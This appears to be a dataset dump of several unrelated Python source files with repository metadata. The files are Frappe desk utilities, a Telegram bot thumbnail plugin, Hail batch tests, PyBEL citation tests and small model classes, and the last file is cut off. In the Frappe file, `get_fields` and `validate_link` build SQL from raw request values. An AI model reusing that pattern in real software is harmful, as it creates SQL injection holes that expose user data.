hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
39e5c2dae3dc34b172fb5b29d42d8de5ab19cf39 | 4,372 | py | Python | frappe/desk/form/utils.py | Steggur/frappe | be95a19704dd3ac667f7ad64e1694dc5d59856fe | [
"MIT"
] | null | null | null | frappe/desk/form/utils.py | Steggur/frappe | be95a19704dd3ac667f7ad64e1694dc5d59856fe | [
"MIT"
] | null | null | null | frappe/desk/form/utils.py | Steggur/frappe | be95a19704dd3ac667f7ad64e1694dc5d59856fe | [
"MIT"
] | 1 | 2018-03-22T00:24:53.000Z | 2018-03-22T00:24:53.000Z | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe, json
import frappe.desk.form.meta
import frappe.desk.form.load
from frappe import _
@frappe.whitelist()
def remove_attach():
"""remove attachment"""
import frappe.utils.file_manager
fid = frappe.form_dict.get('fid')
return frappe.utils.file_manager.remove_file(fid)
@frappe.whitelist()
def get_fields():
"""get fields"""
r = {}
args = {
'select':frappe.form_dict.get('select')
,'from':frappe.form_dict.get('from')
,'where':frappe.form_dict.get('where')
}
ret = frappe.db.sql("select %(select)s from `%(from)s` where %(where)s limit 1" % args)
if ret:
fl, i = frappe.form_dict.get('fields').split(','), 0
for f in fl:
r[f], i = ret[0][i], i+1
frappe.response['message']=r
@frappe.whitelist()
def validate_link():
"""validate link when updated by user"""
import frappe
import frappe.utils
value, options, fetch = frappe.form_dict.get('value'), frappe.form_dict.get('options'), frappe.form_dict.get('fetch')
# no options, don't validate
if not options or options=='null' or options=='undefined':
frappe.response['message'] = 'Ok'
return
if frappe.db.sql("select name from `tab%s` where name=%s" % (options, '%s'), (value,)):
# get fetch values
if fetch:
# escape with "`"
fetch = ", ".join(("`{0}`".format(f.strip()) for f in fetch.split(",")))
frappe.response['fetch_values'] = [frappe.utils.parse_val(c) \
for c in frappe.db.sql("select %s from `tab%s` where name=%s" \
% (fetch, options, '%s'), (value,))[0]]
frappe.response['message'] = 'Ok'
@frappe.whitelist()
def add_comment(doc):
"""allow any logged user to post a comment"""
doc = frappe.get_doc(json.loads(doc))
doc.insert(ignore_permissions = True)
return doc.as_dict()
@frappe.whitelist()
def get_next(doctype, value, prev, filters=None, order_by="modified desc"):
import frappe.desk.reportview
prev = not int(prev)
sort_field, sort_order = order_by.split(" ")
if not filters: filters = []
if isinstance(filters, basestring):
filters = json.loads(filters)
# condition based on sort order
condition = ">" if sort_order.lower()=="desc" else "<"
# switch the condition
if prev:
condition = "<" if condition==">" else "<"
else:
sort_order = "asc" if sort_order.lower()=="desc" else "desc"
# add condition for next or prev item
if not order_by[0] in [f[1] for f in filters]:
filters.append([doctype, sort_field, condition, value])
res = frappe.desk.reportview.execute(doctype,
fields = ["name"],
filters = filters,
order_by = sort_field + " " + sort_order,
limit_start=0, limit_page_length=1, as_list=True)
if not res:
frappe.msgprint(_("No further records"))
return None
else:
return res[0][0]
@frappe.whitelist()
def get_linked_docs(doctype, name, metadata_loaded=None, no_metadata=False):
if not metadata_loaded: metadata_loaded = []
meta = frappe.desk.form.meta.get_meta(doctype)
linkinfo = meta.get("__linked_with")
results = {}
if not linkinfo:
return results
me = frappe.db.get_value(doctype, name, ["parenttype", "parent"], as_dict=True)
for dt, link in linkinfo.items():
link["doctype"] = dt
link_meta_bundle = frappe.desk.form.load.get_meta_bundle(dt)
linkmeta = link_meta_bundle[0]
if not linkmeta.get("issingle"):
fields = [d.fieldname for d in linkmeta.get("fields", {"in_list_view":1,
"fieldtype": ["not in", ["Image", "HTML", "Button", "Table"]]})] \
+ ["name", "modified", "docstatus"]
fields = ["`tab{dt}`.`{fn}`".format(dt=dt, fn=sf.strip()) for sf in fields if sf]
try:
if link.get("get_parent"):
if me and me.parent and me.parenttype == dt:
ret = frappe.get_list(doctype=dt, fields=fields,
filters=[[dt, "name", '=', me.parent]])
else:
ret = None
elif link.get("child_doctype"):
ret = frappe.get_list(doctype=dt, fields=fields,
filters=[[link.get('child_doctype'), link.get("fieldname"), '=', name]])
else:
ret = frappe.get_list(doctype=dt, fields=fields,
filters=[[dt, link.get("fieldname"), '=', name]])
except frappe.PermissionError:
continue
if ret:
results[dt] = ret
if not no_metadata and not dt in metadata_loaded:
frappe.local.response.docs.extend(link_meta_bundle)
return results
| 28.763158 | 118 | 0.674062 |
f256a2a472b2e70ee1c5a55c003a82b8688f94e0 | 3,601 | py | Python | renamer/plugins/thumbnail.py | Anonymous257/TG-RENAMER-BOT | 453eac0fb95e26d5d620a51c5bcb732b88420cd3 | [
"Apache-2.0"
] | null | null | null | renamer/plugins/thumbnail.py | Anonymous257/TG-RENAMER-BOT | 453eac0fb95e26d5d620a51c5bcb732b88420cd3 | [
"Apache-2.0"
] | null | null | null | renamer/plugins/thumbnail.py | Anonymous257/TG-RENAMER-BOT | 453eac0fb95e26d5d620a51c5bcb732b88420cd3 | [
"Apache-2.0"
] | null | null | null | import logging
logger = logging.getLogger(__name__)
import os
from ..config import Config
from ..tools.text import TEXT
from ..database.database import *
from pyrogram import Client as Filerenamer_X1, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
################## Saving thumbnail 🖼 ##################
@Filerenamer_X1.on_message(filters.photo & filters.incoming & filters.private)
async def save_photo(c, m):
if Config.BANNED_USERS:
if m.from_user.id in Config.BANNED_USERS:
return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True)
if Config.BOT_PASSWORD:
is_logged = (await get_data(m.from_user.id)).is_logged
if not is_logged and not Config.AUTH_USERS:
return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True)
download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg"
await update_thumb(m.from_user.id, m.message_id)
await m.download(file_name=download_location)
await m.reply_text(
text=TEXT.SAVED_CUSTOM_THUMBNAIL,
quote=True
)
################## Deleting permanent thumbnail 🗑 ##################
@Filerenamer_X1.on_message(filters.command("deletethumbnail") & filters.incoming & filters.private)
async def delete_thumbnail(c, m):
if Config.BANNED_USERS:
if m.from_user.id in Config.BANNED_USERS:
return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True)
if Config.BOT_PASSWORD:
is_logged = (await get_data(m.from_user.id)).is_logged
if not is_logged and not Config.AUTH_USERS:
return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True)
download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg"
thumbnail = (await get_data(m.from_user.id)).thumb_id
if not thumbnail:
text = TEXT.NO_CUSTOM_THUMB_NAIL_FOUND
else:
await update_thumb(m.from_user.id, None)
text = TEXT.DELETED_CUSTOM_THUMBNAIL
try:
os.remove(download_location)
except:
pass
await m.reply_text(
text=text,
quote=True
)
################## Sending permanent thumbnail 🕶 ##################
@Filerenamer_X1.on_message(filters.command("showthumbnail") & filters.incoming & filters.private)
async def show_thumbnail(c, m):
if Config.BANNED_USERS:
if m.from_user.id in Config.BANNED_USERS:
return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True)
if Config.BOT_PASSWORD:
is_logged = (await get_data(m.from_user.id)).is_logged
if not is_logged and not Config.AUTH_USERS:
return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True)
thumbnail = (await get_data(m.from_user.id)).thumb_id
if not thumbnail:
await m.reply_text(
text=TEXT.NO_CUSTOM_THUMB_NAIL_FOUND,
quote=True
)
else:
download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg"
if not os.path.exists(download_location):
thumb_nail = await c.get_messages(m.chat.id, thumbnail)
try:
download_location = await thumb_nail.download(file_name=download_location)
except:
await update_thumb(m.from_user.id, None)
return await m.reply_text(text=TEXT.NO_CUSTOM_THUMB_NAIL_FOUND, quote=True)
await m.reply_photo(
photo=download_location,
caption=TEXT.THUMBNAIL_CAPTION,
parse_mode="markdown",
quote=True
)
################## THE END 🛑 ##################
| 33.342593 | 99 | 0.655374 |
dcd173f9482187dbe13f05d7223011754615ca50 | 9,268 | py | Python | batch/test/test_dag.py | sigmarkarl/hail | 11b7c22342a945c61b24c5f8babf4ab411d3d2f1 | [
"MIT"
] | null | null | null | batch/test/test_dag.py | sigmarkarl/hail | 11b7c22342a945c61b24c5f8babf4ab411d3d2f1 | [
"MIT"
] | 2 | 2016-11-17T03:06:10.000Z | 2017-12-05T19:00:24.000Z | batch/test/test_dag.py | sigmarkarl/hail | 11b7c22342a945c61b24c5f8babf4ab411d3d2f1 | [
"MIT"
] | 2 | 2020-07-28T18:55:19.000Z | 2020-10-19T16:43:03.000Z | import time
import re
import pytest
from flask import Response
from hailtop.config import get_user_config
from hailtop.batch_client.client import BatchClient, Job
import hailtop.batch_client.aioclient as aioclient
from .utils import batch_status_job_counter, \
legacy_batch_status
from .serverthread import ServerThread
@pytest.fixture
def client():
client = BatchClient('test')
yield client
client.close()
def test_simple(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head])
batch = batch.submit()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 2, status
assert all([j['exit_code'] == 0 for j in status['jobs']])
def test_missing_parent_is_400(client):
try:
batch = client.create_batch()
fake_job = aioclient.Job.unsubmitted_job(batch._async_builder, 10000)
fake_job = Job.from_async_job(fake_job)
batch.create_job('ubuntu:18.04', command=['echo', 'head'], parents=[fake_job])
batch.submit()
except ValueError as err:
assert re.search('parents with invalid job ids', str(err))
return
assert False
def test_dag(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right])
batch = batch.submit()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 4, status
for node in [head, left, right, tail]:
status = node.status()
assert status['state'] == 'Success'
assert node._get_exit_code(status, 'main') == 0
def test_cancel_tail(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job(
'ubuntu:18.04',
command=['/bin/sh', '-c', 'while true; do sleep 86000; done'],
parents=[left, right])
batch = batch.submit()
left.wait()
right.wait()
batch.cancel()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 3, status
for node in [head, left, right]:
status = node.status()
assert status['state'] == 'Success'
assert node._get_exit_code(status, 'main') == 0
assert tail.status()['state'] == 'Cancelled'
def test_cancel_left_after_tail(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job(
'ubuntu:18.04',
command=['/bin/sh', '-c', 'while true; do sleep 86000; done'],
parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right])
batch = batch.submit()
head.wait()
right.wait()
batch.cancel()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 2, status
for node in [head, right]:
status = node.status()
assert status['state'] == 'Success'
assert node._get_exit_code(status, 'main') == 0
for node in [left, tail]:
assert node.status()['state'] == 'Cancelled'
def test_callback(client):
from flask import Flask, request
app = Flask('test-client')
callback_body = []
@app.route('/test', methods=['POST'])
def test():
body = request.get_json()
callback_body.append(body)
return Response(status=200)
try:
server = ServerThread(app)
server.start()
b = client.create_batch(
callback=server.url_for('/test'),
attributes={'foo': 'bar'})
head = b.create_job('alpine:3.8', command=['echo', 'head'])
tail = b.create_job('alpine:3.8', command=['echo', 'tail'], parents=[head])
b = b.submit()
b.wait()
i = 0
while not callback_body:
time.sleep(0.100 * (3/2) ** i)
i += 1
if i > 14:
break
callback_body = callback_body[0]
# verify required fields present
callback_body.pop('cost')
callback_body.pop('msec_mcpu')
callback_body.pop('time_created')
callback_body.pop('time_closed')
callback_body.pop('time_completed')
callback_body.pop('duration')
assert (callback_body == {
'id': b.id,
'billing_project': 'test',
'state': 'success',
'complete': True,
'closed': True,
'n_jobs': 2,
'n_completed': 2,
'n_succeeded': 2,
'n_failed': 0,
'n_cancelled': 0,
'attributes': {'foo': 'bar'}
}), callback_body
finally:
if server:
server.shutdown()
server.join()
def test_no_parents_allowed_in_other_batches(client):
b1 = client.create_batch()
b2 = client.create_batch()
head = b1.create_job('ubuntu:18.04', command=['echo', 'head'])
try:
b2.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head])
except ValueError as err:
assert re.search('parents from another batch', str(err))
return
assert False
def test_input_dependency(client):
bucket_name = get_user_config().get('batch', 'bucket')
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'echo head1 > /io/data1 ; echo head2 > /io/data2'],
output_files=[('/io/data*', f'gs://{bucket_name}')])
tail = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'cat /io/data1 ; cat /io/data2'],
input_files=[(f'gs://{bucket_name}/data*', '/io/')],
parents=[head])
batch.submit()
tail.wait()
assert head._get_exit_code(head.status(), 'main') == 0, head._status
assert tail.log()['main'] == 'head1\nhead2\n', tail.status()
def test_input_dependency_directory(client):
bucket_name = get_user_config().get('batch', 'bucket')
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'mkdir -p /io/test/; echo head1 > /io/test/data1 ; echo head2 > /io/test/data2'],
output_files=[('/io/test/', f'gs://{bucket_name}')])
tail = batch.create_job('ubuntu:18.04',
command=['/bin/sh', '-c', 'cat /io/test/data1; cat /io/test/data2'],
input_files=[(f'gs://{bucket_name}/test', '/io/')],
parents=[head])
batch.submit()
tail.wait()
assert head._get_exit_code(head.status(), 'main') == 0, head._status
assert tail.log()['main'] == 'head1\nhead2\n', tail.status()
def test_always_run_cancel(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['echo', 'head'])
left = batch.create_job(
'ubuntu:18.04',
command=['/bin/sh', '-c', 'while true; do sleep 86000; done'],
parents=[head])
right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head])
tail = batch.create_job('ubuntu:18.04',
command=['echo', 'tail'],
parents=[left, right],
always_run=True)
batch = batch.submit()
right.wait()
batch.cancel()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Success') == 3, status
assert batch_status_job_counter(status, 'Cancelled') == 1, status
for node in [head, right, tail]:
status = node.status()
assert status['state'] == 'Success', status
assert node._get_exit_code(status, 'main') == 0, status
def test_always_run_error(client):
batch = client.create_batch()
head = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'exit 1'])
tail = batch.create_job('ubuntu:18.04',
command=['echo', 'tail'],
parents=[head],
always_run=True)
batch = batch.submit()
batch.wait()
status = legacy_batch_status(batch)
assert batch_status_job_counter(status, 'Failed') == 1
assert batch_status_job_counter(status, 'Success') == 1
for job, ec, state in [(head, 1, 'Failed'), (tail, 0, 'Success')]:
status = job.status()
assert status['state'] == state, status
assert job._get_exit_code(status, 'main') == ec, status
| 36.924303 | 135 | 0.591282 |
6f8e3e23eb5b71660839226903cc28db078b4756 | 8,844 | py | Python | tests/test_manager/test_citation_utils.py | cthoyt/pybel | ed66f013a77f9cbc513892b0dad1025b8f68bb46 | [
"Apache-2.0"
] | null | null | null | tests/test_manager/test_citation_utils.py | cthoyt/pybel | ed66f013a77f9cbc513892b0dad1025b8f68bb46 | [
"Apache-2.0"
] | 11 | 2017-12-28T08:03:14.000Z | 2019-01-15T02:13:58.000Z | tests/test_manager/test_citation_utils.py | cthoyt/pybel | ed66f013a77f9cbc513892b0dad1025b8f68bb46 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Test the manager's citation utilities.
The test data can be created with the following script:
.. code-block:: python
import json
from pybel.manager.citation_utils import get_pubmed_citation_response
DATA = {'29324713', '29359844', '9611787', '25818332', '26438529', '26649137', '27003210'}
rv = get_pubmed_citation_response(DATA)
with open('/Users/cthoyt/dev/bel/pybel/tests/test_manager/citation_data.json', 'w') as file:
json.dump(rv, file, indent=2)
"""
import json
import os
import time
import unittest
from typing import Any, Iterable, Mapping
from unittest import mock
from pybel import BELGraph
from pybel.constants import (
CITATION,
CITATION_AUTHORS,
CITATION_DATE,
CITATION_JOURNAL,
CITATION_TYPE_PUBMED,
)
from pybel.dsl import Protein
from pybel.language import CitationDict
from pybel.manager.citation_utils import (
_enrich_citations,
enrich_pubmed_citations,
get_citations_by_pmids,
sanitize_date,
)
from pybel.manager.models import Citation
from pybel.testing.cases import TemporaryCacheMixin
from pybel.testing.utils import n
HERE = os.path.abspath(os.path.dirname(__file__))
PUBMED_DATA_PATH = os.path.join(HERE, "pubmed_citation_data.json")
with open(PUBMED_DATA_PATH) as _file:
PUBMED_DATA = json.load(_file)
PMC_DATA_PATH = os.path.join(HERE, "pmc_citation_data.json")
with open(PMC_DATA_PATH) as _file:
PMC_DATA = json.load(_file)
def _mock_fn(pubmed_identifiers: Iterable[str]) -> Mapping[str, Any]:
result = {
"uids": pubmed_identifiers,
}
for pmid in pubmed_identifiers:
result[pmid] = PUBMED_DATA["result"][pmid]
return {"result": result}
mock_get_pubmed_citation_response = mock.patch(
"pybel.manager.citation_utils.get_pubmed_citation_response",
side_effect=_mock_fn,
)
def _mock_get_pmc_csl_item(pmc_id: str) -> Mapping[str, Any]:
return PMC_DATA[pmc_id]
mock_get_pmc_csl_item = mock.patch(
"pybel.manager.citation_utils.get_pmc_csl_item",
side_effect=_mock_get_pmc_csl_item,
)
class TestSanitizeDate(unittest.TestCase):
"""Test sanitization of dates in various formats."""
def test_sanitize_1(self):
"""Test YYYY Mon DD."""
self.assertEqual("2012-12-19", sanitize_date("2012 Dec 19"))
def test_sanitize_2(self):
"""Test YYYY Mon."""
self.assertEqual("2012-12-01", sanitize_date("2012 Dec"))
def test_sanitize_3(self):
"""Test YYYY."""
self.assertEqual("2012-01-01", sanitize_date("2012"))
def test_sanitize_4(self):
"""Test YYYY Mon-Mon."""
self.assertEqual("2012-10-01", sanitize_date("2012 Oct-Dec"))
def test_sanitize_5(self):
"""Test YYYY Season."""
self.assertEqual("2012-03-01", sanitize_date("2012 Spring"))
def test_sanitize_6(self):
"""Test YYYY Mon DD-DD."""
self.assertEqual("2012-12-12", sanitize_date("2012 Dec 12-15"))
def test_sanitize_7(self):
"""Test YYYY Mon DD-Mon DD."""
self.assertEqual("2005-01-29", sanitize_date("2005 Jan 29-Feb 4"))
def test_sanitize_nope(self):
"""Test failure."""
self.assertEqual(None, sanitize_date("2012 Early Spring"))
class TestPubmed(TemporaryCacheMixin):
"""Tests for citations."""
def setUp(self):
super().setUp()
self.u, self.v = (Protein(n(), n()) for _ in range(2))
self.pmid = "9611787"
self.graph = BELGraph()
self.graph.add_increases(self.u, self.v, citation=self.pmid, evidence=n())
@mock_get_pubmed_citation_response
def test_enrich_pubmed(self, *_):
self.assertEqual(0, self.manager.count_citations())
get_citations_by_pmids(manager=self.manager, pmids=[self.pmid])
self.assertEqual(1, self.manager.count_citations())
c = self.manager.get_citation_by_pmid(self.pmid)
self.assertIsNotNone(c)
self.assertIsInstance(c, Citation)
self.assertEqual(CITATION_TYPE_PUBMED, c.db)
self.assertEqual(self.pmid, c.db_id)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_list(self, *_):
pmids = [
"25818332",
"27003210",
"26438529",
"26649137",
]
get_citations_by_pmids(manager=self.manager, pmids=pmids)
citation = self.manager.get_or_create_citation(namespace=CITATION_TYPE_PUBMED, identifier="25818332")
self.assertIsNotNone(citation)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_list_grouped(self, *_):
pmids = [
"25818332",
"27003210",
"26438529",
"26649137",
]
get_citations_by_pmids(manager=self.manager, pmids=pmids, group_size=2)
citation = self.manager.get_citation_by_pmid("25818332")
self.assertIsNotNone(citation)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_overwrite(self, *_):
citation = self.manager.get_or_create_citation(namespace=CITATION_TYPE_PUBMED, identifier=self.pmid)
self.manager.session.commit()
self.assertIsNone(citation.date)
self.assertIsNone(citation.title)
enrich_pubmed_citations(manager=self.manager, graph=self.graph)
_, _, d = list(self.graph.edges(data=True))[0]
citation_dict = d[CITATION]
self.assertIsInstance(citation_dict, CitationDict)
self.assertIn(CITATION_JOURNAL, citation_dict)
self.assertIn(CITATION_DATE, citation_dict)
self.assertEqual("1998-05-01", citation_dict[CITATION_DATE])
self.assertIn(CITATION_AUTHORS, citation_dict)
self.assertEqual(
{"Lewell XQ", "Judd DB", "Watson SP", "Hann MM"},
set(citation_dict[CITATION_AUTHORS]),
)
@mock_get_pubmed_citation_response
def test_enrich_pubmed_graph(self, *_):
enrich_pubmed_citations(manager=self.manager, graph=self.graph)
_, _, d = list(self.graph.edges(data=True))[0]
citation_dict = d[CITATION]
self.assertIsInstance(citation_dict, CitationDict)
self.assertIn(CITATION_JOURNAL, citation_dict)
self.assertIn(CITATION_DATE, citation_dict)
self.assertEqual("1998-05-01", citation_dict[CITATION_DATE])
self.assertIn(CITATION_AUTHORS, citation_dict)
self.assertEqual(
{"Lewell XQ", "Judd DB", "Watson SP", "Hann MM"},
set(citation_dict[CITATION_AUTHORS]),
)
@mock_get_pubmed_citation_response
@unittest.skipIf(os.environ.get("DB") == "mysql", reason="MySQL collation is wonky")
def test_enrich_pubmed_accent_duplicate(self, *_):
"""Test when two authors, Gomez C and Goméz C are both checked that they are not counted as duplicates."""
g1 = "Gomez C"
g2 = "Gómez C"
pmid_1, pmid_2 = pmids = [
"29324713",
"29359844",
]
get_citations_by_pmids(manager=self.manager, pmids=pmids)
time.sleep(1)
x = self.manager.get_citation_by_pmid(pmid_1)
self.assertIsNotNone(x)
self.assertEqual("Martínez-Guillén JR", x.first.name, msg="wrong first author name")
self.assertIn(g1, self.manager.object_cache_author)
self.assertIn(g2, self.manager.object_cache_author)
a1 = self.manager.get_author_by_name(g1)
self.assertEqual(g1, a1.name)
a2 = self.manager.get_author_by_name(g2)
self.assertEqual(g2, a2.name)
class TestPMC(TemporaryCacheMixin):
"""Tests for citations."""
def setUp(self):
super().setUp()
self.u, self.v = (Protein(n(), n()) for _ in range(2))
self.citation_identifier = "PMC6611653"
self.graph = BELGraph()
self.graph.add_increases(self.u, self.v, citation=("pmc", self.citation_identifier), evidence=n())
@mock_get_pmc_csl_item
def test_enrich_pmc(self, *_):
errors = _enrich_citations(manager=self.manager, graph=self.graph, prefix="pmc")
self.assertEqual(0, len(errors), msg=f"Got errors: {errors}")
_, _, d = list(self.graph.edges(data=True))[0]
citation_dict = d[CITATION]
self.assertIsInstance(citation_dict, CitationDict)
self.assertEqual("pmc", citation_dict.namespace)
self.assertEqual(self.citation_identifier, citation_dict.identifier)
self.assertIn(CITATION_JOURNAL, citation_dict)
self.assertEqual("PLoS computational biology", citation_dict[CITATION_JOURNAL])
self.assertIn(CITATION_DATE, citation_dict)
self.assertEqual("2019-06-24", citation_dict[CITATION_DATE])
self.assertIn(CITATION_AUTHORS, citation_dict)
self.assertLess(0, len(citation_dict[CITATION_AUTHORS]))
# TODO the eUtils and CSL thing both normalize the way autors look
| 33 | 114 | 0.676278 |
d50ba0b3f5281f1614b3009b6707bea85f17e078 | 592 | py | Python | sits.py | Peter1-cyber/sits | 218bc3b08adee33af438fc9300d73167a1f0cbeb | [
"CC0-1.0"
] | null | null | null | sits.py | Peter1-cyber/sits | 218bc3b08adee33af438fc9300d73167a1f0cbeb | [
"CC0-1.0"
] | null | null | null | sits.py | Peter1-cyber/sits | 218bc3b08adee33af438fc9300d73167a1f0cbeb | [
"CC0-1.0"
] | null | null | null | # Модуль для вычисления количества приседаний
# Здесь должен быть твой код
from scrollLabel import *
class Sits(ScrollLabel):
def __init__(self, total, **kwargs):
self.total = total
self.current = 0
text = 'Осталось приседаний: ' + str(self.total)
super().__init__(text, **kwargs)
def next(self, *args):
self.current +=1
self.remain = max(0, self.total - self.current)
self.text = 'Осталось приседаний: ' + str(self.remain)
super().set_text(self.text)
| 14.095238 | 63 | 0.560811 |
b80a59e936eb4c99d8035f8de23550d979a1fc23 | 1,296 | py | Python | bw2analyzer/explorer.py | aleksandra-kim/brightway2-analyzer-copy | c85961bd2b644458fbeef92e5471ec76d520ab38 | [
"BSD-3-Clause"
] | null | null | null | bw2analyzer/explorer.py | aleksandra-kim/brightway2-analyzer-copy | c85961bd2b644458fbeef92e5471ec76d520ab38 | [
"BSD-3-Clause"
] | null | null | null | bw2analyzer/explorer.py | aleksandra-kim/brightway2-analyzer-copy | c85961bd2b644458fbeef92e5471ec76d520ab38 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from eight import *
from bw2data import Database, databases
class DatabaseExplorer(object):
def __init__(self, name):
self.db = Database(name)
self.data = self.db.load()
for db in databases[name]["depends"]:
self.data.update(Database(db).load())
def uses_this_process(self, key, recursion=0):
if recursion:
return dict(
[
(k, self.uses_this_process(k, recursion - 1))
for k in self.data
if key in [e["input"] for e in self.data[k].get("exchanges", [])]
]
)
else:
return [
k
for k in self.data
if key in [e["input"] for e in self.data[k].get("exchanges", [])]
]
def provides_this_process(self, key, recursion=0):
if recursion:
return dict(
[
(e["input"], self.provides_this_process(e["input"], recursion - 1))
for e in self.data[key].get("exchanges", [])
]
)
else:
return [(e["input"], ()) for e in self.data[key].get("exchanges", [])]
| 31.609756 | 87 | 0.493056 |
ceb25b59075fc25d5f7f629dd0c227f75693ba99 | 2,661 | py | Python | easybimehlanding/models/insurance_companies.py | kmelodi/EasyBimehLanding_Python | b574a76a8805b306a423229b572c36dae0159def | [
"MIT"
] | null | null | null | easybimehlanding/models/insurance_companies.py | kmelodi/EasyBimehLanding_Python | b574a76a8805b306a423229b572c36dae0159def | [
"MIT"
] | null | null | null | easybimehlanding/models/insurance_companies.py | kmelodi/EasyBimehLanding_Python | b574a76a8805b306a423229b572c36dae0159def | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
easybimehlanding
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
import easybimehlanding.models.combo_data_model
class InsuranceCompanies(object):
"""Implementation of the 'InsuranceCompanies' model.
TODO: type model description here.
Attributes:
is_success (bool): TODO: type description here.
status (int): TODO: type description here.
message (list of ComboDataModel): TODO: type description here.
extra_data (string): TODO: type description here.
exception (string): TODO: type description here.
"""
# Create a mapping from Model property names to API property names
_names = {
"is_success":'isSuccess',
"status":'status',
"message":'message',
"extra_data":'extraData',
"exception":'exception'
}
def __init__(self,
is_success=None,
status=None,
message=None,
extra_data=None,
exception=None):
"""Constructor for the InsuranceCompanies class"""
# Initialize members of the class
self.is_success = is_success
self.status = status
self.message = message
self.extra_data = extra_data
self.exception = exception
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
is_success = dictionary.get('isSuccess')
status = dictionary.get('status')
message = None
if dictionary.get('message') != None:
message = list()
for structure in dictionary.get('message'):
message.append(easybimehlanding.models.combo_data_model.ComboDataModel.from_dictionary(structure))
extra_data = dictionary.get('extraData')
exception = dictionary.get('exception')
# Return an object of this model
return cls(is_success,
status,
message,
extra_data,
exception)
| 30.586207 | 115 | 0.579481 |
ce2275e75339c595de7561a4a0163e3aac451139 | 8,516 | py | Python | src/backend/game/models.py | ToJestKrzysio/TheJungleGame | 904dd4adc937145df2c8c353eb83bec3b5dd1f7e | [
"MIT"
] | null | null | null | src/backend/game/models.py | ToJestKrzysio/TheJungleGame | 904dd4adc937145df2c8c353eb83bec3b5dd1f7e | [
"MIT"
] | null | null | null | src/backend/game/models.py | ToJestKrzysio/TheJungleGame | 904dd4adc937145df2c8c353eb83bec3b5dd1f7e | [
"MIT"
] | null | null | null | import logging
import os
from abc import ABC, abstractmethod
from typing import Tuple, TYPE_CHECKING
import numpy as np
